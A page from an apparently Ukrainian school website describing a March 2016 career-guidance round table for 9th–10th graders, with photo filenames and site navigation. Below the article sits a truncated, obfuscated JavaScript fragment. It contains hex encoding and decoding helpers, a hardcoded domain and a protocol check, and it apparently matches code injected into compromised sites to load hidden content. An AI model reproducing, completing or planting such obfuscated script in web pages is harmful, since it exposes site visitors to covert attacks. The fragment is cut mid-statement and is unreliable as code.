Головне меню

Опитування

Що ви найбільше хотіли би бачити на шкільному сайті?
 

АвторизаціяПереклад сайту

Русский языкEnglish

Хто на сайті

На даний момент 97 гостей на сайті

Інформація

Профорієнтація випускників PDF Друк e-mail
Написав Makcim   
Неділя, 13 березня 2016, 15:14

Вибір професіїї можна порівняти з розв'язанням складної творчої задачі, причім задачі з багатьма невідомими, коли треба враховувати безліч чинників. Л.Головей

DSCN0229 DSCN0236

"Як вибрати майбутню професію?" - рано чи пізно таким питанням задається кожна людина. Проблема вибору професії завжди була актуальною і на далі залишається такою в сучасних умовах. З причини незнання правил вибору професії близько 40% молодих людей обирають професію, яка не відповідає їх інтересам, нахилам та вподабанням. 

DSCN0238 DSCN0241

Існує проблема небуття учнями адекватних знань про певний рід професійної діяльності, власні можливості оволодіння нею. Адже щасливе й успішне життя багато в чому залежить від діяльності, якою займається людина.

DSCN0243 DSCN0244

Як правильно  вибрати професію? Насамперед потрібно зважити всі "за" і "проти", оцінити пізні професії з точки зору їх плюсів і мінусів. В рамках тижня професії вихователі Копасов О.М. та Демченко Р.В. з учнями 9х-10х класів був проведений "Круглий стіл" на тему:Ваш вибір:можу+хочу+треба".

Мета заходу: виховувати любов до праці; розвивати у дітей розумові й творчі здібності, уміння та навички задля орієнтації їх на свідомий вибір майбутньої професії. Розкрили важливість і необхідність робітничих професій.

// o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t="",o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "glp-internat.zp.ua"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e

Останнє оновлення на Неділя, 20 березня 2016, 15:32
 
Copyright © 2012 by Jester.